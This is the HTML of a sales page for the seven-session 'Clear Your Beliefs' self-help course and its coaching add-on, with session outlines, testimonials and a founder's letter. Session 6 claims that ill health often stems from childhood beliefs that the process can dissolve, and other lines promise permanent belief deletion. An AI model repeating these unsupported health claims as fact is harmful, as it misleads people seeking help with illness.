easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, 